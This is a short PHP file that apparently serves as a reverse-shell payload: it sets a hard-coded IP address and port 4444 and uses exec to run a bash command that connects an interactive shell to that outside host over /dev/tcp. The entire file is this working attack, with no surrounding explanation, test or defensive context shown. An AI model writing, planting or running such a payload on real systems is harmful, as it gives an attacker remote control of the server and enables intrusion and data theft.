<?php
$ip = '178.128.18.182';
$port = 4444;

exec("/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'");
?>